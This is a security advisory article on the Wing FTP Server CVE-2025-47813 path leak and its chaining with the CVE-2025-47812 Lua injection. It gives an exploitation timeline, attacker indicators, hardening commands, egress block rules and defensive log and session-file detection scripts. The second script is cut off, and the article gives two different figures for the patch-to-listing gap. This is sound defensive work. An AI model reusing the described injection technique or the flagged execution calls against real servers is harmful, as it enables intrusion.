CISA Adds Wing FTP CVE-2025-47813 to KEV: Server Path Leak Fuels Active Attacks

On March 16, 2026, CISA added CVE-2025-47813 — a Wing FTP Server information disclosure vulnerability — to its Known Exploited Vulnerabilities catalog. Despite carrying only a medium CVSS score of 4.3, the flaw is being weaponized in live attacks. The reason is straightforward: it hands attackers the server's installation path, a critical piece of intelligence that makes the companion critical-severity remote code execution bug significantly easier to exploit.

Key figures
CVE-2025-47813 carries a CVSS 3.1 base score of 4.3 — medium severity. That score reflects limited standalone impact: information disclosure only, no write access, no code execution. CISA placed it on the KEV catalog regardless because severity score and exploitation impact are different measurements. When chained with CVE-2025-47812, the effective impact of this flaw escalates to CVSS 10.0.
CVE-2025-47812 is a CVSS 10.0 null byte and Lua code injection flaw in the same Wing FTP Server web interface. It allows unauthenticated attackers to achieve remote code execution as SYSTEM on Windows or root on Linux. The path disclosure from CVE-2025-47813 is what makes this flaw reliably exploitable at scale, particularly against Windows targets with non-standard installation paths.
Julien Ahrens published full technical write-ups and proof-of-concept code on June 30, 2025. Huntress confirmed the first in-the-wild exploitation of CVE-2025-47812 on July 1, 2025 — one day later. This 24-hour window between public PoC and active exploitation is consistent with how financially motivated attackers prioritize file transfer server vulnerabilities. Standard patch cycles measured in weeks or months are not sufficient for this threat class.
Censys identified approximately 5,004 Wing FTP Server instances specifically exposing their web interfaces directly to the internet around the time of PoC publication in late June and early July 2025 — out of 8,103 total Wing FTP devices detected. Only web-interface-exposed instances are vulnerable to CVE-2025-47812 and CVE-2025-47813, since both exploits require HTTP POST requests. The remaining hosts identified via FTP and SSH banners lack the exposed HTTP interface and are not susceptible to these specific exploits. Organizations that restrict the web interface to trusted IP ranges or place it behind a VPN are not in this exposure category regardless of patch status.
Wing FTP Server 7.4.4 — which patches CVE-2025-47813 — was released on May 14, 2025. CISA added CVE-2025-47813 to the KEV catalog on March 16, 2026: roughly ten months later. This gap is not a sign the vulnerability was dormant. It reflects how long independent documentation of the path disclosure step as an actively exploited component took to accumulate sufficiently for a formal KEV listing. Organizations should not treat the listing date as the exploitation start date.

The addition follows a pattern that defenders have come to recognize in the managed file transfer space. Systems that sit at the network perimeter handling high-value data — financial records, backups, proprietary files — attract persistent attacker attention. Wing FTP Server, used by more than 10,000 customers worldwide according to the vendor, including organizations such as the U.S. Air Force, Airbus, Reuters, and Sony, fits that profile precisely. CISA's March 16 action gives federal agencies a hard deadline of March 30, 2026 to patch. Private sector organizations are strongly encouraged to treat that same date as their own target.

What Is Wing FTP Server and Who Uses It

Wing FTP Server is a commercial file transfer solution available for Windows, Linux, and macOS. It supports FTP, FTPS, SFTP, and HTTP/HTTPS protocols and is widely deployed by businesses, managed service providers, and hosting companies that need to securely share and manage files across networks. Its web-based administration interface — built on an embedded HTTP server — is central to how administrators and authenticated users interact with the platform, and it is precisely that web interface where both critical vulnerabilities discovered by researcher Julien Ahrens reside (MITRE ATT&CK T1190).

The software's broad deployment across multiple industries and its frequent exposure at network perimeters make it a high-priority target. File transfer servers occupy a particularly sensitive position in enterprise architecture: they typically hold or facilitate access to large volumes of sensitive data while maintaining inbound and outbound connectivity that lateral movement-focused attackers prize. That combination — rich data access plus network positioning — is why the Wing FTP vulnerabilities attracted rapid exploitation interest after technical details were published.

The Vulnerability: CVE-2025-47813 Explained

CVE-2025-47813 is an information disclosure vulnerability classified under CWE-209, which covers the generation of error messages that contain sensitive information. The flaw exists in how Wing FTP Server's web interface processes the UID session cookie value on the /loginok.html endpoint. When a logged-in user — or an attacker who has authenticated, including via an anonymous account — sends a request with a UID cookie value that exceeds the maximum path length permitted by the underlying operating system, the server does not handle the error gracefully. Instead, it generates a verbose error message that reveals the full local installation path of the application (MITRE ATT&CK T1083).

According to Julien Ahrens of RCE Security, when a UID cookie value exceeds the operating system's maximum path length, Wing FTP Server responds with an error message that exposes the full local server installation path — rather than handling the oversized input gracefully.

Researcher Julien Ahrens of RCE Security discovered and responsibly disclosed this vulnerability alongside two others — CVE-2025-47812 and CVE-2025-27889 — and published proof-of-concept exploit code on GitHub. The CVE was formally published in July 2025, following Wing FTP's release of version 7.4.4 on May 14, 2025, which patched all three issues. All Wing FTP Server versions at or below 7.4.3 are affected. The CVSS 3.1 vector for CVE-2025-47813 is AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N, reflecting that the attack is remotely exploitable, requires low privileges, and needs no user interaction — though the resulting compromise is limited to information disclosure on its own.

The third vulnerability disclosed by Ahrens on June 30, 2025, CVE-2025-27889, is a link injection flaw at the /downloadpass.html endpoint. It does not sanitize the url parameter, allowing an attacker to inject an arbitrary link. If a target clicks that link and submits the login form, their cleartext password is disclosed to the attacker-controlled destination. Unlike CVE-2025-47812 and CVE-2025-47813, this flaw requires user interaction and carries a CVSS score of 3.4. Critically, it was patched earlier — in Wing FTP Server 7.4.3, released March 30, 2025 — not in 7.4.4. An organization running 7.4.3 is already protected against CVE-2025-27889 but remains fully exposed to CVE-2025-47812 and CVE-2025-47813 until upgrading to 7.4.4 or later.

There is a fourth vulnerability in this family that deserves direct attention: CVE-2025-47811. Unlike the other three, it has no patch and the vendor has stated it will not be fixed. CVE-2025-47811 is a privilege escalation flaw rooted in a design choice: Wing FTP Server's administrative web interface, which listens by default on port 5466, runs as root on Linux and NT AUTHORITY\SYSTEM on Windows with no privilege separation, sandboxing, or rights reduction — even for anonymous accounts. The web interface itself provides legitimate mechanisms to execute arbitrary system commands through the web console and task scheduler, and those commands execute with the highest possible system privileges. Administrative FTP users are not necessarily operating system administrators, meaning this design grants web-level users OS-level power.

Ahrens stated plainly in his CVE-2025-47811 advisory that the vendor's position is to leave the privilege level unchanged, describing it as acceptable behavior despite its role in enabling root access on compromised systems. The practical consequence is that CVE-2025-47811 is the amplifier behind the severity of CVE-2025-47812. Without CVE-2025-47811, a successful Lua injection would execute with whatever limited privileges a properly hardened FTP service might hold. Because Wing FTP runs as root/SYSTEM by default, the injection achieves total system compromise. Organizations that cannot immediately patch or restrict CVE-2025-47812 should treat CVE-2025-47811 as an ongoing unresolved design risk and consider whether Wing FTP Server is the appropriate platform for their environment given the vendor's stated position.

CVE-2025-47813 Exploit Flow
  • Stage 1: Authenticate to the web interface (anonymous account or valid credentials).
  • Stage 2: Send a request carrying an overlong UID cookie.
  • Stage 3: The server's error message leaks the installation path.
  • Stage 4: The leaked path is used to target CVE-2025-47812.
  • Stage 5: Remote code execution as SYSTEM (or root on Linux).
CVE-2025-47813 serves as reconnaissance infrastructure for the critical CVE-2025-47812 remote code execution exploit chain

On its own, CVE-2025-47813 does not allow an attacker to modify data, execute commands, or maintain access. What it does do is reduce the uncertainty in a subsequent exploitation attempt. Knowing the exact installation path allows an attacker to precisely target session files and other filesystem-dependent components of the application — which is directly relevant to the companion vulnerability.

Patch Status

CVE-2025-47813 is patched in Wing FTP Server version 7.4.4, released May 14, 2025. Version 7.4.5 also contains the fix. All organizations running version 7.4.3 or earlier are vulnerable. The CISA KEV listing was updated March 16, 2026, with a federal remediation due date of March 30, 2026. Source: CISA KEV Catalog

The Companion Threat: CVE-2025-47812 and Chained Exploitation

Understanding why CVE-2025-47813 matters requires understanding what it enables. The second vulnerability patched in Wing FTP Server version 7.4.4, CVE-2025-47812, carries a CVSS score of 10.0 — the maximum possible. It is a null byte injection and Lua code injection flaw that allows an attacker to achieve remote code execution as root on Linux systems or as SYSTEM on Windows. The two vulnerabilities were disclosed together by Ahrens, who noted they could be chained for maximum impact.

Ahrens noted in his advisory for CVE-2025-47812 that a successful exploit of CVE-2025-47813 returns the application's local server path — information that directly assists in exploiting the RCE flaw. (RCE Security)

The mechanics of CVE-2025-47812 center on how the /loginok.html endpoint processes the username parameter during authentication. The c_CheckUser() function — responsible for verifying credentials — uses strlen() internally, which truncates strings at null bytes. An attacker can inject a null byte into a username such as anonymous\0[malicious_lua_code]. The authentication check sees only the portion before the null byte and succeeds. But the session creation function, rawset(_SESSION, "username", username), writes the entire, unsanitized username — including the injected Lua payload — into a session file on disk (MITRE ATT&CK T1059.010, T1505.003). This class of authentication endpoint exploitation — where credential handling and session writing are governed by different code paths — has produced some of the most severe server-side vulnerabilities in recent years.

When the attacker subsequently makes a GET request to an authenticated endpoint like /dir.html using the returned UID cookie, the server loads and executes that session file, running the injected Lua code with elevated operating system privileges. According to analysis by Huntress, observed attackers used this execution path to hex-decode payloads, run commands via cmd.exe (MITRE ATT&CK T1059.003), and use certutil to download and execute malware from remote locations (MITRE ATT&CK T1105, T1071.001). Researchers at Fidelis Security noted indicators including the presence of unexpected Lua code fragments in session files and anomalous commands returned after authenticated web interface access.

The link to CVE-2025-47813 becomes clear when you consider that writing and locating session files depends on knowing where the application is installed. The path leak from CVE-2025-47813 removes guesswork from the CVE-2025-47812 exploitation chain, particularly on Windows systems where local path structures are less predictable than on standard Linux installations. According to analysis from RedPacket Security, Windows-based Wing FTP deployments face heightened risk specifically because path disclosure is immediately actionable in environments where filesystem layouts vary between installations.

From Disclosure to Active Exploitation: A Timeline

The history of these vulnerabilities illustrates how quickly threat actors move once technical details become public — and how a flaw can remain unpatched for months before receiving the regulatory attention that forces action.

Exploitation Timeline
May 14, 2025
Wing FTP Server 7.4.4 Released
The patch for CVE-2025-47812, CVE-2025-47813, and CVE-2025-27889 ships following responsible disclosure by Julien Ahrens of RCE Security. The patch is available — but adoption is not enforced.
June 30, 2025
Full Technical Write-ups and PoC Published
Ahrens publishes exploit proof-of-concept code on GitHub and the RCE Security blog — including the "What the NULL?!" advisory for CVE-2025-47812. The clock for mass exploitation begins.
June 30 – July 1, 2025
Censys Finds ~5,000 Exposed Instances
Censys identifies 8,103 total Wing FTP Server devices on the internet, of which 5,004 have exposed web interfaces — the exact attack surface for CVE-2025-47812 and CVE-2025-47813. Hosts identified only via FTP and SSH banners lack the HTTP interface and are not vulnerable to these specific exploits.
July 1, 2025
First Confirmed In-the-Wild Exploitation
Huntress detects active exploitation of CVE-2025-47812 on a customer system — just one day after the public write-up appeared. The attacker used null-byte-injected usernames, created malicious .lua session files, and attempted external payload downloads via certutil.
July 10 – July 14, 2025
NVD Publication and First KEV Entry
CVE-2025-47813 is formally published in the National Vulnerability Database on July 10. CISA adds CVE-2025-47812 to the KEV catalog on July 14, acknowledging active exploitation of the RCE flaw.
March 16, 2026
CISA Adds CVE-2025-47813 to KEV
Nearly eight months after the patch and more than eight months after initial exploitation, CISA adds the medium-severity path disclosure flaw to KEV. Federal agencies are given until March 30, 2026 to remediate. The gap is a lesson in how reconnaissance flaws are systematically undervalued.

The roughly eight-month gap between the exploitation of CVE-2025-47812 and the KEV listing of CVE-2025-47813 reflects an important operational reality. Information disclosure vulnerabilities are often treated as lower-priority items by patch management programs. When attackers chain them with critical severity bugs, that deprioritization becomes a vulnerability of its own. CISA's decision to list a CVSS 4.3 vulnerability on KEV is an explicit signal that severity score alone is an insufficient basis for remediation prioritization.

Who Is Exploiting This and What They Are After

CISA's KEV listing confirms active exploitation but does not attribute it to specific threat actors, and the official KEV entry marks "Known To Be Used in Ransomware Campaigns?" as Unknown. The available incident data points to opportunistic, financially motivated attackers — but not confirmed ransomware operators. Huntress's July 2025 analysis of the first confirmed exploitation described behavior that was, by the researchers' own account, relatively unsophisticated. The attackers connected from multiple IP addresses (including a source at 185.196.9.225), sent malformed commands containing non-printable characters and invalid syntax, and were repeatedly frustrated by Microsoft Defender on the targeted host. The attack was detected and contained before any payload fully executed.

The post-exploitation objective in the confirmed Huntress incident was not ransomware deployment — it was persistent remote access. Attackers used the Lua injection to download and execute malicious Lua files, conducted system reconnaissance commands (whoami, ipconfig, netstat), created new unauthorized user accounts for persistence, and attempted to install ScreenConnect remote monitoring and management software. A recovered Lua file retrieved from the host contained a download command pointing to oooooooo11.screenconnect.com, with a connection string extracting to instance-y9tbyl-relay.screenconnect.com. There was no evidence the MSI installer was successfully executed. Huntress's assessment was that the attackers were likely initial access operators — not the final threat actors — whose goal was to establish a foothold to sell or hand off.

File transfer servers are a known ransomware staging ground even when confirmed ransomware is not yet in the picture. The 2023 Cl0p campaigns against MOVEit Transfer and GoAnywhere MFT — which collectively affected hundreds of organizations and produced hundreds of millions of dollars in disclosed losses — established the template. A single compromised Wing FTP Server instance may hold backups, financial exports, HR records, customer data, and inter-departmental transfers that would otherwise require lateral movement through multiple systems to reach. Organizations should not scope their incident response to the Wing FTP host alone if compromise is suspected. The investigation starts there and follows the network.

Why Medium Severity Vulnerabilities Land on KEV

CISA's Known Exploited Vulnerabilities catalog is not a severity ranking system. It is an exploitation tracking system. The catalog exists, as established under Binding Operational Directive 22-01, to maintain a living list of CVEs that carry significant risk to the federal enterprise because they are being used in real attacks — regardless of their theoretical severity score. CVE-2025-47813's addition to the catalog alongside entries for vulnerabilities with CVSS scores of 9.0 and above underscores this point directly.

The eight-month gap between the July 2025 KEV listing of CVE-2025-47812 and the March 2026 listing of CVE-2025-47813 is worth interrogating. Both vulnerabilities were patched simultaneously, disclosed simultaneously, and exploited in the same chain. The most likely explanation is evidentiary: CISA's standard for KEV listing requires confirmed in-the-wild exploitation — not theoretical exploitability, not published PoC code, but observed use in real attacks. In July 2025, the exploitation evidence for CVE-2025-47812 was immediate. CVE-2025-47813 may have been used in the same chain but not yet documented independently as an exploited component. As exploitation continued and analysts accumulated evidence specifically attributing the path disclosure step to active campaigns, the threshold for a separate listing was reached. For defenders, that distinction matters: CVE-2025-47813 has almost certainly been in use since July 2025 — the March 2026 listing means the evidence crossed CISA's documentation bar, not that exploitation started then.

The broader pattern here is one security teams should internalize: attackers increasingly chain medium and low severity vulnerabilities to achieve high-impact outcomes. An information disclosure flaw provides reconnaissance. Reconnaissance reduces exploitation friction. Reduced exploitation friction means that a critical vulnerability that might otherwise require time-consuming pre-attack enumeration becomes reliably exploitable at scale. The KEV catalog entry for CVE-2025-47813 acknowledges that it is performing exactly that function in ongoing campaigns.

CISA's KEV entry for CVE-2025-47813 describes the flaw as a vulnerability that generates an error message containing sensitive information when a long value is used in the UID cookie. (CISA, KEV Catalog, March 16, 2026)

The catalog also notes, as it does for every entry, that this type of vulnerability is a frequent attack vector for malicious cyber actors and poses significant risks to the federal enterprise. That language is formulaic, but the underlying logic is substantive: file transfer servers are a proven target class. The 2023 campaigns against MOVEit and GoAnywhere MFT demonstrated that threat actors — including financially motivated ransomware groups — treat file transfer infrastructure as a high-value target worth investing significant resources to exploit.

Wing FTP's KEV appearances in both July 2025 and March 2026 place it firmly in that same threat landscape. Organizations that have not patched since the initial CVE-2025-47812 KEV listing are now operating with both a critical RCE vulnerability and a confirmed information disclosure vulnerability under active exploitation, with public proof-of-concept code available for both.

What Organizations Must Do Now

The remediation path is unambiguous. Wing FTP Server version 7.4.4 and all subsequent releases, including 7.4.5, address CVE-2025-47813. Organizations running any version at or below 7.4.3 should upgrade immediately. The vendor's release history is documented at wftpserver.com/serverhistory.htm, and the NVD entry for CVE-2025-47813 is available at nvd.nist.gov.

For organizations that cannot patch immediately, CISA's guidance aligned with BOD 22-01 specifies the following mitigations as acceptable interim measures:

  • Apply vendor-supplied mitigations in full per the published instructions.
  • Restrict access to the Wing FTP web interface via network segmentation and firewall rules, limiting it to trusted IP ranges rather than exposing it to the internet.
  • Disable anonymous FTP logins to reduce the attack surface for CVE-2025-47812.
  • Implement WAF rules to detect and reject requests containing abnormally long UID cookie values.
  • Enable detailed HTTP and session logging for the Wing FTP service, retaining logs for incident response purposes.
  • If no patch or mitigation can be deployed promptly, discontinue use of the product until remediation is possible.

Running Wing FTP under a least-privilege service account

The standard guidance above does not address CVE-2025-47811, which has no patch and will not receive one. The vendor's position is that running the service as root or SYSTEM is acceptable. It is not — and organizations can override this design decision themselves.

On Linux, create a dedicated, locked service account with no shell and no home directory, then reassign ownership of the installation and session directories to that account:

useradd --system --no-create-home --shell /usr/sbin/nologin wingftp
chown -R wingftp:wingftp /opt/wingftp/
chmod 750 /opt/wingftp/

Update the Wing FTP service unit file to run as that user:

[Service]
User=wingftp
Group=wingftp

On Windows, create a dedicated local service account, add it to the minimum necessary groups (typically none beyond the built-in service accounts), grant it "Log on as a service" rights via Local Security Policy, and change the Wing FTP service to run under that account in Services Manager. Explicitly deny it access to administrative shares and local admin group membership. This does not make CVE-2025-47812 unexploitable — but it means a successful Lua injection achieves only the permissions of the service account, not SYSTEM. The blast radius of a compromise shrinks substantially.

Harden the session directory against write exploitation

The CVE-2025-47812 exploit chain requires the Wing FTP process to write a malicious session file to the session directory and then execute it. These are two separate filesystem operations, and separating their permission requirements breaks the chain.

On Linux, if the Wing FTP service account has been separated from root, you can mount the session directory with noexec:

/opt/wingftp/sessions /opt/wingftp/sessions none bind,noexec 0 0

The noexec flag prevents the kernel from executing files from that mount point directly. Because Wing FTP executes session files through the Lua interpreter rather than as standalone executables, this specific control may not fully block Lua-level execution — but it eliminates one class of payload delivery and buys time for other controls to fire. More effective on Windows: use an explicit ACL on the session directory that grants the service account write permission but removes execute permission from files created there. Combined with Windows Defender Application Control (WDAC) or AppLocker rules that whitelist WFTPServer.exe but block it from loading Lua files from the session path, the chain can be interrupted at the execution step without preventing the server from functioning normally. This requires testing in a staging environment before production deployment.

Block outbound egress from the Wing FTP process

The confirmed July 2025 exploitation used certutil — invoked from the Wing FTP server process — to pull an external payload via HTTP. The attack relied on outbound internet access from a file transfer server. Most file transfer server deployments have no legitimate operational need for outbound HTTP connections to arbitrary internet destinations. Blocking this specifically at the process level is more durable than general firewall rules, which can be bypassed if an attacker pivots to another process on the same host.

On Windows, a Windows Defender Firewall outbound rule scoped to WFTPServer.exe that denies all outbound connections except to configured client ranges would have stopped the July 2025 payload delivery entirely. On Linux, iptables or nftables rules using the -m owner --uid-owner wingftp match (once the service runs under a dedicated account) can restrict outbound connections by process UID:

iptables -A OUTPUT -m owner --uid-owner wingftp -p tcp --dport 80 -j DROP
iptables -A OUTPUT -m owner --uid-owner wingftp -p tcp --dport 443 -j DROP

Allow only the specific ports and destinations Wing FTP legitimately needs for its operation — typically inbound FTP/SFTP/HTTPS from clients, with no outbound HTTP to the internet. This is not a substitute for patching but it meaningfully limits post-exploitation capability.

Disable Wing FTP's web console and task scheduler

CVE-2025-47811 specifically describes the web console and task scheduler as the mechanisms through which legitimate administrative access produces arbitrary command execution at root/SYSTEM. If your deployment does not operationally require these features — and many do not — disable them in Wing FTP's administrative configuration. The web console (accessible via the admin interface on port 5466) allows running shell commands interactively. The task scheduler allows scheduling commands to run as the service account. Both are off-the-shelf privilege escalation vectors if an attacker gains any level of administrative access to the web interface.

Disabling them does not patch CVE-2025-47811, but it removes the execution surface the vulnerability relies on. Combined with restricting port 5466 access to a specific administrative workstation or jump host — rather than the general network — the attack surface of the admin interface shrinks to a small, tightly controlled footprint.

Deploy real-time file integrity monitoring on the session directory

Reactive threat hunting after a suspected compromise is slow. A faster approach is file integrity monitoring (FIM) configured specifically on the Wing FTP session directory, alerting in real time whenever a new .lua file is created or an existing one grows beyond a defined size threshold.

On Linux, auditd can watch the session directory with minimal overhead:

auditctl -w /opt/wingftp/sessions/ -p wa -k wingftp_sessions

This generates an audit event for every write and attribute-change in the session directory. Filter these events in your SIEM for files whose size exceeds 500 bytes — any such event during a session that did not correspond to a known large file transfer operation should trigger investigation. On Windows, enable Object Access auditing on the session folder via Group Policy, and use a SIEM or Wazuh agent to consume the Security event log for Event ID 4663 (file write) scoped to that path. The alert latency between exploit execution and defender notification in this setup is measured in seconds, not hours.

Build a structured log pipeline, not just verbose logging

Enabling verbose logging is necessary but not sufficient. Wing FTP's HTTP access logs are flat-file text logs that most SIEMs will ingest as unstructured strings. To make the UID cookie length detectable as a queryable field, you need a log parser — not just log ingestion.

The Wing FTP HTTP access log records requests in a format similar to Combined Log Format. Cookie headers are logged in the full request string. Write a custom parser in your SIEM (Splunk, Elastic, Sentinel, QRadar, etc.) that:

  • Extracts the UID cookie value from the Cookie: header in Wing FTP HTTP access log lines.
  • Calculates the character length of that value.
  • Indexes it as a numeric field (uid_cookie_length).
  • Fires an alert when that field exceeds 300 on a request to /loginok.html.

Without this structured extraction, "enable logging" produces gigabytes of text that no alert rule can query against the right field. With it, you have a real-time detection that catches CVE-2025-47813 exploitation attempts before the path is disclosed and before the chain progresses to CVE-2025-47812.
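As an added example (not code from the page, the vendor, or any of the cited researchers) of the parser and alert rule described above, and of the same length check a WAF rule under the interim mitigations would apply: this Python script extracts the UID cookie from constructed Wing FTP-style access log lines, indexes its length as uid_cookie_length, and flags requests to /loginok.html whose value exceeds 300 characters. The log layout (Combined Log Format with the Cookie header as a trailing quoted field) and the sample lines are assumptions; adapt the regular expression to the exact format your Wing FTP version writes.

```python
"""Detect over-length UID cookies in Wing FTP HTTP access logs.

Added example, not vendor code. The log layout below is an assumption:
Combined Log Format plus one trailing quoted field holding the request's
Cookie header. All sample lines are constructed, not captured traffic.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

UID_LENGTH_THRESHOLD = 300      # alert rule from the page: length > 300 ...
TARGET_PATH = "/loginok.html"   # ... on a request to this endpoint

# Assumed layout: ip ident user [ts] "METHOD target HTTP/x.y" status size
# "referer" "user-agent" "cookie-header"   (the last field may be absent)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" '
    r'"(?P<agent>[^"]*)"(?: "(?P<cookie>[^"]*)")?$'
)
# UID may be the first cookie or follow others separated by "; ".
UID_RE = re.compile(r'(?:^|;\s*)UID=(?P<uid>[^;]*)')


@dataclass
class AccessEvent:
    ip: str
    ts: str
    method: str
    path: str
    status: int
    uid_cookie_length: int   # the numeric field the page says to index


def uid_cookie_length(cookie_header: Optional[str]) -> int:
    """Character length of the UID cookie value; 0 when no UID cookie is present."""
    if not cookie_header:
        return 0
    m = UID_RE.search(cookie_header)
    return len(m.group("uid")) if m else 0


def parse_line(line: str) -> Optional[AccessEvent]:
    """Turn one access-log line into a structured event, or None if it does not match."""
    m = LOG_RE.match(line.rstrip("\r\n"))
    if not m:
        return None
    path = m.group("target").split("?", 1)[0]   # drop any query string
    return AccessEvent(
        ip=m.group("ip"), ts=m.group("ts"), method=m.group("method"),
        path=path, status=int(m.group("status")),
        uid_cookie_length=uid_cookie_length(m.group("cookie")),
    )


def is_alert(ev: AccessEvent, threshold: int = UID_LENGTH_THRESHOLD) -> bool:
    """The page's rule: UID cookie longer than the threshold on /loginok.html."""
    return ev.path == TARGET_PATH and ev.uid_cookie_length > threshold


def find_alerts(lines: Iterable[str]) -> List[AccessEvent]:
    """Parse every line and return only the events that match the alert rule."""
    return [ev for ev in map(parse_line, lines) if ev is not None and is_alert(ev)]


# Constructed sample log (203.0.113.0/24 is documentation address space).
SAMPLE_LOG = [
    # normal login followed by a directory listing: 32-character UID
    '203.0.113.10 - - [01/Jul/2025:03:14:07 +0000] "POST /loginok.html HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0" "UID=2f8a1c9e4b7d0e3f6a5b4c3d2e1f0a9b"',
    '203.0.113.10 - - [01/Jul/2025:03:14:08 +0000] "GET /dir.html HTTP/1.1" '
    '200 2048 "-" "Mozilla/5.0" "UID=2f8a1c9e4b7d0e3f6a5b4c3d2e1f0a9b"',
    # 400-character UID on /loginok.html, server answered with an error
    '203.0.113.77 - - [01/Jul/2025:03:20:41 +0000] "POST /loginok.html?x=1 HTTP/1.1" '
    '500 331 "-" "python-requests/2.31" "lang=en; UID=' + "A" * 400 + '"',
    # same oversized cookie on another endpoint: outside the page's rule
    '203.0.113.77 - - [01/Jul/2025:03:20:42 +0000] "GET /dir.html HTTP/1.1" '
    '200 17 "-" "python-requests/2.31" "UID=' + "A" * 400 + '"',
    # request without any cookie header
    '203.0.113.5 - - [01/Jul/2025:03:21:00 +0000] "GET / HTTP/1.1" 200 1200 "-" "curl/8.0"',
]

if __name__ == "__main__":
    for ev in find_alerts(SAMPLE_LOG):
        print(f"ALERT {ev.ts} {ev.ip} {ev.method} {ev.path} "
              f"status={ev.status} uid_cookie_length={ev.uid_cookie_length}")
```

Widening is_alert to any path turns the same pipeline into a watch on oversized UID cookies reaching other endpoints, which the page's rule does not require but a SIEM analyst may want as a lower-severity signal.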

Micro-segment the Wing FTP host at the network layer

Patching and hardening the Wing FTP host addresses the immediate vulnerability. Micro-segmentation limits the blast radius if the host is ever compromised through a future flaw. A file transfer server has a well-defined, narrow communication profile: it accepts inbound connections from clients on specific ports, and it may need to reach specific backend storage or directory services. Nothing else.

Place the Wing FTP host in a dedicated VLAN or network zone with a deny-by-default east-west policy. Define explicit allow rules only for:

  • Inbound FTP (21), FTPS (990), SFTP (22), HTTPS (443) from authorized client ranges.
  • Inbound admin access on port 5466 from a specific jump host or management VLAN only.
  • Outbound access to any NAS, SAN, or file share the server legitimately serves.
  • Outbound access to your SIEM/log aggregator.
  • No outbound internet access from the host unless explicitly required by a documented business need.

With this segmentation in place, a fully compromised Wing FTP host cannot scan internal networks, cannot reach domain controllers, and cannot laterally move to adjacent systems without the traffic being blocked at the network layer and logged. The attacker's foothold remains isolated. This does not prevent the initial compromise but it changes the economics of the attack — a foothold on an isolated file transfer server is significantly less valuable to an initial access broker than one with unrestricted internal access.

Assessing whether Wing FTP remains the right platform

CVE-2025-47811 is not a mistake the vendor plans to correct — it is a design philosophy the vendor has explicitly defended. Running a network-facing service as root/SYSTEM with no privilege separation is a structural property of the platform that patch management alone cannot resolve. Organizations evaluating whether to continue on Wing FTP should weigh several factors:

  • Operational need for the web interface. If your users and administrators access Wing FTP exclusively through FTP/SFTP clients and your team manages it via the CLI or the Windows service manager, the web interface exposure is unnecessary. Consider whether the web interface can be completely disabled rather than merely restricted.
  • Sensitivity of transferred data. A Wing FTP instance handling financial exports, PII, or health records under regulatory compliance requirements carries a different risk calculus than one handling internal build artifacts. The higher the data sensitivity, the stronger the argument for a platform with documented privilege separation architecture.
  • Vendor security posture signal. A vendor that publicly declines to patch a privilege escalation vulnerability discovered alongside a CVSS 10.0 RCE flaw is providing a signal about how they will respond to future security research. Organizations with high security maturity requirements should factor vendor response history into platform selection decisions.
  • Alternatives with better isolation. Platforms such as SFTP-only servers (OpenSSH with ChrootDirectory), Cerberus FTP, or managed cloud-based file transfer services (AWS Transfer Family, Azure Blob with SAS tokens) offer varying degrees of privilege isolation that Wing FTP does not. Any migration evaluation should include a privilege model comparison, not just a feature comparison.

None of this is a recommendation to migrate immediately. Wing FTP 7.4.4 with the hardening controls described above is a defensible configuration. The question is whether a defensible configuration today is sufficient if the vendor's position on privilege isolation does not change, and whether future research produces further CVEs on the same architectural surface.

Security teams should also conduct threat hunting across systems that have been running Wing FTP Server 7.4.3 or earlier. Indicators to look for include unusual session .lua files in the application directory, unexpected outbound network connections originating from the Wing FTP server process (WFTPServer.exe on Windows), evidence of certutil being invoked from the server process, and new user accounts created on the host that are not accounted for in normal operations (MITRE ATT&CK T1136). Huntress noted in its July 2025 incident analysis that exploitation activity ramped up rapidly after PoC publication — any unpatched server with internet exposure should be treated as potentially compromised and investigated accordingly.

A forensically precise detail from Huntress's incident analysis: legitimate Wing FTP session object files are named using 64 hexadecimal character filenames with a .lua extension, stored in the server's session directory. Malicious session files created during exploitation follow the same naming convention and will not stand out by name alone. What distinguishes them is file size — legitimate session files are small, storing only username, current directory, and IP address. Inflated session file sizes indicate injected Lua code. Defenders conducting a compromise investigation should enumerate all .lua session files, sort by file size, and manually inspect any that are significantly larger than the typical 200–400 byte range for a clean session object.
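The session-file hunt described above, written out as an added example (not Huntress's or Wing FTP's own tooling): it enumerates 64-hex .lua files in a session directory, sorts them largest first, and flags any over the 500-byte threshold from the remediation steps or containing Lua calls a serialized session should never hold. The session directory path, the sample files it writes, and the list of flagged Lua calls are assumptions constructed for this example.

```python
import os
import re
import tempfile
from typing import List, Tuple

# Heuristics from the Huntress analysis: legitimate session objects are
# 64-hex-character .lua files of a few hundred bytes.
SESSION_NAME = re.compile(r"^[0-9a-f]{64}\.lua$", re.IGNORECASE)
SIZE_THRESHOLD = 500  # bytes; the hunt threshold used in the remediation steps

# Lua calls that a serialized session object should never contain. This list is
# an assumption chosen for illustration, not taken from the advisory.
SUSPICIOUS_CALLS = ("os.execute", "io.popen", "loadstring", "dofile")


def assess_session_file(size: int, head: bytes) -> List[str]:
    """Return the reasons a session file looks suspicious (empty list if clean)."""
    reasons = []
    if size > SIZE_THRESHOLD:
        reasons.append(f"size {size} bytes exceeds {SIZE_THRESHOLD}")
    text = head.decode("utf-8", errors="replace")
    reasons.extend(f"contains {call}" for call in SUSPICIOUS_CALLS if call in text)
    return reasons


def hunt_session_dir(session_dir: str) -> List[Tuple[str, int, List[str]]]:
    """Enumerate 64-hex .lua session files, largest first, each with its flags."""
    findings = []
    for name in os.listdir(session_dir):
        if not SESSION_NAME.match(name):
            continue  # not a session object by name; skip it
        path = os.path.join(session_dir, name)
        size = os.path.getsize(path)
        with open(path, "rb") as fh:
            head = fh.read(4096)  # enough to spot injected calls near the top
        findings.append((name, size, assess_session_file(size, head)))
    findings.sort(key=lambda f: f[1], reverse=True)
    return findings


def build_demo_dir() -> str:
    """Write constructed sample files to a temp directory: one clean session,
    one inflated session, and one unrelated file that the hunt must ignore."""
    d = tempfile.mkdtemp(prefix="wftp_sessions_")
    with open(os.path.join(d, "a" * 64 + ".lua"), "w") as fh:
        fh.write('username="alice"\ncurrent_dir="/"\nip="10.0.0.5"\n')
    with open(os.path.join(d, "b" * 64 + ".lua"), "w") as fh:
        fh.write('username="alice"\n' + "-- filler\n" * 60 + 'os.execute("id")\n')
    with open(os.path.join(d, "notes.txt"), "w") as fh:
        fh.write("not a session file\n")
    return d


if __name__ == "__main__":
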